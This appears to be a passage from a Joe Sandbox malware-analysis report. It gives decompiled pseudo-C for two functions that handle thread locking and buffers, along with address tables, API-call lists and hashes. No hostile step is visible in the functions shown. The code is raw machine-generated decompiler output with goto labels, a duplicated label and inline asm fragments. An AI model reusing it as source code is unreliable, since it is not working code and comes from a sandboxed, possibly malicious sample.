							 *((intOrPtr*)(_t245 + 0x2c)) = _t219;
							 *((intOrPtr*)(_t234 + 0xb0)) = _t238;
							 *((intOrPtr*)(_t234 + 0xb4)) = _t219;
							 *(_t245 + 0x10) = 0 | _t181 == _t238;
						} else {
							if( *((intOrPtr*)(_t181 + 0xc)) != 0) {
								L8:
								_t175 = E0040B090( *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t181 + 0xc)), _t245 + 0x14);
								_t209 =  *((intOrPtr*)(_t245 + 0x14));
								_t229 = _t175;
								_t238 = _t209 +  *((intOrPtr*)(_t234 + 0xb0));
								asm("adc eax, [esi+0xb4]");
								 *((intOrPtr*)(_t234 + 0xb0)) = _t238;
								 *((intOrPtr*)(_t245 + 0x2c)) = 0;
								 *((intOrPtr*)(_t234 + 0xb4)) = 0;
								if(_t229 == 0) {
									 *(_t245 + 0x10) = 0 | _t209 !=  *_t234;
								} else {
									goto L9;
								}
							} else {
								_t180 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x20))))))();
								 *((intOrPtr*)(_t181 + 0xc)) = _t180;
								if(_t180 != 0) {
									goto L8;
								} else {
									_t12 = _t180 + 2; // 0x2
									_t229 = _t12;
									L9:
									 *(_t234 + 0x3c) = _t229;
									E00416D30(_t234 + 0x208, _t229);
								}
							}
						}
					}
					 *(_t245 + 0x20) = 0;
					if(L00417E00( *((intOrPtr*)(_t234 + 0x34))) != 0) {
						 *(_t245 + 0x20) = 0xc;
						if(_t229 == 0) {
							_t229 = 0xc;
						}
					}
					_t138 =  *(_t234 + 0xa8);
					 *(_t245 + 0x18) = _t138;
					_t139 = _t138 + 1;
					 *(_t234 + 0xa8) = _t139;
					if(_t139 >=  *((intOrPtr*)(_t234 + 0xa4))) {
						 *(_t234 + 0xa8) = 0;
					}
					_t183 = _t181 | 0xffffffff;
					if(_t229 != 0) {
						L28:
						 *(_t245 + 0x10) = 1;
						goto L29;
					} else {
						_t164 = E00416D10(_t234 + 0x208);
						_t229 = _t164;
						if(_t229 != 0) {
							goto L28;
						} else {
							if( *(_t245 + 0x10) != _t164) {
								L29:
								 *(_t234 + 0x38) = 1;
							} else {
								_t165 =  *(_t234 + 0xa0);
								if( *(_t234 + 0xa0) <  *((intOrPtr*)(_t234 + 0x9c)) && ( *((intOrPtr*)(_t234 + 8)) != _t238 ||  *((intOrPtr*)(_t234 + 0xc)) !=  *((intOrPtr*)(_t245 + 0x2c)))) {
									_t229 = E00416A00(_t234 + 0x5c8 + (_t165 + _t165 * 2) * 8);
									if(_t229 != 0) {
										E00416D30(_t234 + 0x208, _t229);
										goto L28;
									} else {
										 *(_t234 + 0xa0) =  *(_t234 + 0xa0) + 1;
									}
								}
							}
						}
					}
					if(L00417F20( *((intOrPtr*)(_t245 + 0x1c))) != 0) {
						L67:
						return 0xc;
					} else {
						_t142 =  *(_t245 + 0x20);
						if(_t142 != 0) {
							L70:
							return _t142;
						} else {
							if(_t229 == 0) {
								_t232 = _t234 + 0xb8;
								EnterCriticalSection(_t232);
								_t183 =  *(_t234 + 0xd0);
								 *(_t234 + 0xd0) =  *(_t234 + 0xd4 + _t183 * 4);
								LeaveCriticalSection(_t232);
								if( *((intOrPtr*)(_t234 + 0x10)) == 0) {
									_t159 =  *((intOrPtr*)(_t245 + 0x24));
								} else {
									_t159 =  *((intOrPtr*)( *(_t245 + 0x34) + 0xc));
								}
								_t229 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x24))))))(_t183, _t159,  *((intOrPtr*)(_t245 + 0x14)),  *(_t245 + 0x10));
								if(_t229 != 0) {
									E00416D30(_t234 + 0x208, _t229);
								}
							}
							_t144 = _t234 + 0x238 + ( *(_t245 + 0x18) +  *(_t245 + 0x18) * 2) * 4;
							 *_t144 = _t229;
							_t144[1] = _t183;
							_t144[2] =  *(_t245 + 0x10);
							EnterCriticalSection(_t234 + 0xb8);
							_t242 =  *(_t234 + 0x48);
							_t146 =  *(_t245 + 0x18);
							if(_t242 != _t146) {
								 *((char*)(_t146 + _t234 + 0x4c)) = 1;
							} else {
								 *(_t234 + 0x48) = 0xffffffff;
							}
							LeaveCriticalSection(_t234 + 0xb8);
							if(_t242 ==  *(_t245 + 0x18)) {
								_t148 =  *(_t234 + 0x44);
								if(_t148 != 0) {
									_t229 = _t148;
								}
								L46:
								L46:
								if(_t229 == 0 && _t183 != 0xffffffff) {
									_t229 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x24)) + 4))))();
									if(_t229 != 0) {
										 *(_t234 + 0x44) = _t229;
										E00416D30(_t234 + 0x208, _t229);
									}
								}
								_t242 = _t242 + 1;
								if(_t242 >=  *((intOrPtr*)(_t234 + 0xa4))) {
									_t242 = 0;
								}
								EnterCriticalSection(_t234 + 0xb8);
								if(_t183 != 0xffffffff) {
									 *(_t234 + 0xd4 + _t183 * 4) =  *(_t234 + 0xd0);
									 *(_t234 + 0xd0) = _t183;
								}
								_t186 =  *(_t234 + _t242 + 0x4c) & 0x000000ff;
								if(_t186 == 0) {
									 *(_t234 + 0x48) = _t242;
								} else {
									 *(_t234 + _t242 + 0x4c) = 0;
								}
								LeaveCriticalSection(_t234 + 0xb8);
								if(E00418050(_t234 + 0x34) != 0) {
									goto L67;
								}
								if(_t186 == 0) {
									if( *(_t245 + 0x10) != 0) {
										goto L69;
									} else {
										goto L65;
									}
								} else {
									_t153 = _t234 + 0x238 + (_t242 + _t242 * 2) * 4;
									if(_t229 == 0) {
										_t198 =  *_t153;
										if(_t198 != 0) {
											_t229 = _t198;
										}
									}
									_t183 = _t153[1];
									 *(_t245 + 0x10) = _t153[2];
									goto L46;
								}
							} else {
								if(_t229 != 0) {
									L69:
									_t142 = 0;
									goto L70;
								} else {
									_t272 =  *(_t245 + 0x10) - _t229;
									L65:
									if(_t272 != 0) {
										goto L69;
									} else {
										_t238 = 0;
										 *((intOrPtr*)(_t245 + 0x2c)) = 0;
										if(L00417E00( *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x1c))))) == 0) {
											continue;
										} else {
											goto L67;
										}
									}
								}
							}
						}
					}
					L71:
				}
				_t132 = L00417F20( *((intOrPtr*)(_t245 + 0x1c)));
				asm("sbb eax, eax");
				return  ~_t132 & 0x0000000c;
				goto L71;
			}































                                                                                                    0x0041648c
                                                                                                    0x00416490
                                                                                                    0x00416490
                                                                                                    0x00416498
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004164a9
                                                                                                    0x004164ad
                                                                                                    0x004164b1
                                                                                                    0x004164b5
                                                                                                    0x004164bf
                                                                                                    0x004164c5
                                                                                                    0x004164c7
                                                                                                    0x004164ce
                                                                                                    0x00416545
                                                                                                    0x00416548
                                                                                                    0x0041654e
                                                                                                    0x00416556
                                                                                                    0x0041655a
                                                                                                    0x0041655c
                                                                                                    0x0041655e
                                                                                                    0x0041655e
                                                                                                    0x00416567
                                                                                                    0x00416569
                                                                                                    0x0041656c
                                                                                                    0x00416577
                                                                                                    0x0041657b
                                                                                                    0x00416581
                                                                                                    0x00416587
                                                                                                    0x004164d0
                                                                                                    0x004164d3
                                                                                                    0x004164ec
                                                                                                    0x004164f7
                                                                                                    0x004164fc
                                                                                                    0x00416500
                                                                                                    0x00416506
                                                                                                    0x0041650c
                                                                                                    0x00416512
                                                                                                    0x00416518
                                                                                                    0x0041651c
                                                                                                    0x00416524
                                                                                                    0x0041653f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004164d5
                                                                                                    0x004164de
                                                                                                    0x004164e0
                                                                                                    0x004164e5
                                                                                                    0x00000000
                                                                                                    0x004164e7
                                                                                                    0x004164e7
                                                                                                    0x004164e7
                                                                                                    0x00416526
                                                                                                    0x0041652e
                                                                                                    0x00416531
                                                                                                    0x00416531
                                                                                                    0x004164e5
                                                                                                    0x004164d3
                                                                                                    0x004164ce
                                                                                                    0x0041658e
                                                                                                    0x0041659d
                                                                                                    0x0041659f
                                                                                                    0x004165a9
                                                                                                    0x004165ab
                                                                                                    0x004165ab
                                                                                                    0x004165a9
                                                                                                    0x004165b0
                                                                                                    0x004165b6
                                                                                                    0x004165ba
                                                                                                    0x004165bb
                                                                                                    0x004165c7
                                                                                                    0x004165c9
                                                                                                    0x004165c9
                                                                                                    0x004165d3
                                                                                                    0x004165d8
                                                                                                    0x00416637
                                                                                                    0x00416637
                                                                                                    0x00000000
                                                                                                    0x004165da
                                                                                                    0x004165e0
                                                                                                    0x004165e5
                                                                                                    0x004165e9
                                                                                                    0x00000000
                                                                                                    0x004165eb
                                                                                                    0x004165ef
                                                                                                    0x0041663f
                                                                                                    0x0041663f
                                                                                                    0x004165f1
                                                                                                    0x004165f1
                                                                                                    0x004165fd
                                                                                                    0x0041661c
                                                                                                    0x00416620
                                                                                                    0x00416632
                                                                                                    0x00000000
                                                                                                    0x00416622
                                                                                                    0x00416622
                                                                                                    0x00416622
                                                                                                    0x00416620
                                                                                                    0x004165fd
                                                                                                    0x004165ef
                                                                                                    0x004165e9
                                                                                                    0x00416651
                                                                                                    0x00416816
                                                                                                    0x00416822
                                                                                                    0x00416657
                                                                                                    0x00416657
                                                                                                    0x0041665d
                                                                                                    0x00416841
                                                                                                    0x00416848
                                                                                                    0x00416663
                                                                                                    0x00416665
                                                                                                    0x00416667
                                                                                                    0x0041666e
                                                                                                    0x00416674
                                                                                                    0x00416682
                                                                                                    0x00416688
                                                                                                    0x00416692
                                                                                                    0x0041669d
                                                                                                    0x00416694
                                                                                                    0x00416698
                                                                                                    0x00416698
                                                                                                    0x004166be
                                                                                                    0x004166c2
                                                                                                    0x004166cc
                                                                                                    0x004166cc
                                                                                                    0x004166c2
                                                                                                    0x004166dc
                                                                                                    0x004166e3
                                                                                                    0x004166e5
                                                                                                    0x004166e8
                                                                                                    0x004166f2
                                                                                                    0x004166f8
                                                                                                    0x004166fb
                                                                                                    0x00416701
                                                                                                    0x0041670c
                                                                                                    0x00416703
                                                                                                    0x00416703
                                                                                                    0x00416703
                                                                                                    0x00416718
                                                                                                    0x00416722
                                                                                                    0x00416735
                                                                                                    0x0041673a
                                                                                                    0x0041673c
                                                                                                    0x0041673c
                                                                                                    0x00000000
                                                                                                    0x00416740
                                                                                                    0x00416742
                                                                                                    0x00416756
                                                                                                    0x0041675a
                                                                                                    0x00416764
                                                                                                    0x00416767
                                                                                                    0x00416767
                                                                                                    0x0041675a
                                                                                                    0x0041676c
                                                                                                    0x00416773
                                                                                                    0x00416775
                                                                                                    0x00416775
                                                                                                    0x0041677e
                                                                                                    0x00416787
                                                                                                    0x0041678f
                                                                                                    0x00416796
                                                                                                    0x00416796
                                                                                                    0x0041679c
                                                                                                    0x004167a3
                                                                                                    0x004167ac
                                                                                                    0x004167a5
                                                                                                    0x004167a5
                                                                                                    0x004167a5
                                                                                                    0x004167b6
                                                                                                    0x004167c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004167ca
                                                                                                    0x004167f7
                                                                                                    0x00000000
                                                                                                    0x004167f9
                                                                                                    0x00000000
                                                                                                    0x004167f9
                                                                                                    0x004167cc
                                                                                                    0x004167d0
                                                                                                    0x004167d9
                                                                                                    0x004167db
                                                                                                    0x004167df
                                                                                                    0x004167e1
                                                                                                    0x004167e1
                                                                                                    0x004167df
                                                                                                    0x004167e3
                                                                                                    0x004167e9
                                                                                                    0x00000000
                                                                                                    0x004167e9
                                                                                                    0x00416724
                                                                                                    0x00416726
                                                                                                    0x0041683f
                                                                                                    0x0041683f
                                                                                                    0x00000000
                                                                                                    0x0041672c
                                                                                                    0x0041672c
                                                                                                    0x004167fb
                                                                                                    0x004167fb
                                                                                                    0x00000000
                                                                                                    0x004167fd
                                                                                                    0x00416803
                                                                                                    0x00416805
                                                                                                    0x00416810
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00416810
                                                                                                    0x004167fb
                                                                                                    0x00416726
                                                                                                    0x00416722
                                                                                                    0x0041665d
                                                                                                    0x00000000
                                                                                                    0x00416651
                                                                                                    0x00416829
                                                                                                    0x00416832
                                                                                                    0x0041683c
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                      • Part of subcall function 00416D10: EnterCriticalSection.KERNEL32(?,?,?,004164A9), ref: 00416D18
                                                                                                      • Part of subcall function 00416D10: LeaveCriticalSection.KERNEL32(?,?,?,004164A9), ref: 00416D22
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0041666E
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00416688
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 004166F2
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00416718
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0041677E
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 004167B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168844106-0
                                                                                                    • Opcode ID: 5389d1f9c051db9995cdbd1180ac52ecf74ccbabe385d04a416f6c7d0173781c
                                                                                                    • Instruction ID: 7bc682647923523aa1e646abf4266ec0c25c09393d0b1da5de32ed4039347590
                                                                                                    • Opcode Fuzzy Hash: 5389d1f9c051db9995cdbd1180ac52ecf74ccbabe385d04a416f6c7d0173781c
                                                                                                    • Instruction Fuzzy Hash: D5612C71204701CFC760DF28D180BA7B7E6BF84314F52492EE8AA87351EB38E885CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CF90 Relevance: 5.1, APIs: 4, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040CF90(signed int __edx, intOrPtr* __edi, void* __eflags) {
				void* __ecx;
				void* _t47;
				void* _t50;
				intOrPtr _t53;
				signed int _t55;
				void* _t72;
				intOrPtr _t74;
				void* _t90;
				signed int _t92;
				intOrPtr* _t99;
				intOrPtr* _t101;
				struct _CRITICAL_SECTION* _t106;
				intOrPtr* _t110;
				signed int* _t112;

				_t99 = __edi;
				_t92 = __edx;
				 *_t112 = 0;
				_t47 = L00417E00( *((intOrPtr*)(__edi + 0x168)));
				if( *((intOrPtr*)(__edi + 0x160)) == 0) {
					do {
						L004219C0( *((intOrPtr*)(_t99 + 0x194)));
						while(1) {
							L3:
							_t101 =  *((intOrPtr*)(_t99 + 0x194));
							if(L00421A60(_t101) != 0) {
								break;
							}
							_t50 = L00417E00( *((intOrPtr*)(_t99 + 0x170)));
							if( *((intOrPtr*)(_t99 + 0x160)) != 0) {
								goto L15;
							}
							if( *((intOrPtr*)(_t99 + 0x164)) != 0) {
								goto L14;
							}
							L00421BA0(_t101);
							_t74 =  *((intOrPtr*)(_t101 + 0xc)) -  *(_t101 + 4);
							_t112[3] = _t112[3] + 1;
							_t110 = ((_t112[3] & 0x00000001) << 0x13) +  *((intOrPtr*)(_t99 + 0x108));
							 *_t110 = 2;
							 *((intOrPtr*)(_t110 + 4)) = _t74;
							_t53 =  *((intOrPtr*)(_t101 + 0x48));
							if(_t74 >= _t53) {
								_t74 = _t74 + 1 - _t53;
								if(_t74 > 0x1fffe) {
									_t74 = 0x1fffe;
								}
								_t55 =  *(_t101 + 4);
								if(_t55 > (_t92 | 0xffffffff) - _t74) {
									_t90 = _t55 -  *((intOrPtr*)(_t101 + 0x50)) - 1;
									 *((intOrPtr*)(_t101 + 0xc)) =  *((intOrPtr*)(_t101 + 0xc)) - _t90;
									 *(_t101 + 4) = _t55 - _t90;
									L00421A90(_t90,  *((intOrPtr*)(_t101 + 0x24)) +  *(_t101 + 0x54) * 4,  *((intOrPtr*)(_t101 + 0x2c)) + 1);
								}
								 *_t110 = _t74 + 2;
								_t92 =  *(_t101 + 4);
								 *((intOrPtr*)( *((intOrPtr*)(_t99 + 0x190))))( *((intOrPtr*)(_t101 + 0x24)) +  *(_t101 + 0x54) * 4,  *((intOrPtr*)(_t101 + 0x2c)), _t110 + 8, _t74, _t101 + 0x60);
							}
							 *(_t101 + 4) =  *(_t101 + 4) + _t74;
							 *_t101 =  *_t101 + _t74;
							E00418050(_t99 + 0x174);
						}
						_t106 = _t99 + 0x70;
						EnterCriticalSection(_t106);
						EnterCriticalSection(_t99 + 0x178);
						L00421A00(_t101);
						_t72 =  *_t101 -  *_t101;
						 *_t99 =  *_t99 - _t72;
						 *((intOrPtr*)(_t99 + 0x12c)) =  *((intOrPtr*)(_t99 + 0x12c)) - _t72;
						LeaveCriticalSection(_t99 + 0x178);
						LeaveCriticalSection(_t106);
						goto L3;
						L14:
						L00417F20(_t99 + 0x16c);
						_t112[3] = 0;
						_t50 = L00417E00( *((intOrPtr*)(_t99 + 0x168)));
					} while ( *((intOrPtr*)(_t99 + 0x160)) == 0);
					L15:
					return _t50;
				}
				return _t47;
			}

















                                                                                                    0x0040cf90
                                                                                                    0x0040cf90
                                                                                                    0x0040cf97
                                                                                                    0x0040cf9e
                                                                                                    0x0040cfaa
                                                                                                    0x0040cfb3
                                                                                                    0x0040cfb9
                                                                                                    0x0040cfc0
                                                                                                    0x0040cfc0
                                                                                                    0x0040cfc0
                                                                                                    0x0040cfcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040d013
                                                                                                    0x0040d01f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040d02c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040d034
                                                                                                    0x0040d040
                                                                                                    0x0040d043
                                                                                                    0x0040d04d
                                                                                                    0x0040d053
                                                                                                    0x0040d05a
                                                                                                    0x0040d05d
                                                                                                    0x0040d062
                                                                                                    0x0040d06b
                                                                                                    0x0040d073
                                                                                                    0x0040d075
                                                                                                    0x0040d075
                                                                                                    0x0040d07a
                                                                                                    0x0040d084
                                                                                                    0x0040d08e
                                                                                                    0x0040d08f
                                                                                                    0x0040d094
                                                                                                    0x0040d0a2
                                                                                                    0x0040d0a2
                                                                                                    0x0040d0ae
                                                                                                    0x0040d0c3
                                                                                                    0x0040d0cf
                                                                                                    0x0040d0cf
                                                                                                    0x0040d0d1
                                                                                                    0x0040d0d4
                                                                                                    0x0040d0dc
                                                                                                    0x0040d0dc
                                                                                                    0x0040cfd7
                                                                                                    0x0040cfdb
                                                                                                    0x0040cfe4
                                                                                                    0x0040cfea
                                                                                                    0x0040cfef
                                                                                                    0x0040cff7
                                                                                                    0x0040cff9
                                                                                                    0x0040d006
                                                                                                    0x0040d009
                                                                                                    0x00000000
                                                                                                    0x0040d0e6
                                                                                                    0x0040d0ec
                                                                                                    0x0040d0f7
                                                                                                    0x0040d0ff
                                                                                                    0x0040d104
                                                                                                    0x0040d111
                                                                                                    0x00000000
                                                                                                    0x0040d113
                                                                                                    0x0040d115

                                                                                                    APIs
                                                                                                      • Part of subcall function 00417E00: WaitForSingleObject.KERNEL32(?,000000FF,003C9BE4,?), ref: 00417E03
                                                                                                      • Part of subcall function 00417E00: GetLastError.KERNEL32(?,000000FF,003C9BE4,?), ref: 00417E0E
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040CFDB
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040CFE4
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D006
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D009
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2116739831-0
                                                                                                    • Opcode ID: 54bbab50f0c112e64e3ab9fe6abd26d453661c8cf5b8163ba561f126668901be
                                                                                                    • Instruction ID: a6eaca0e884c91b59f4540f7a3f2e8799cd5e5132910cf0ed35a1c2e128e8674
                                                                                                    • Opcode Fuzzy Hash: 54bbab50f0c112e64e3ab9fe6abd26d453661c8cf5b8163ba561f126668901be
                                                                                                    • Instruction Fuzzy Hash: 7A413931604B069FC718DF75C980ADAF7E5BF48314F00862EE4AA47681DB39B995CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%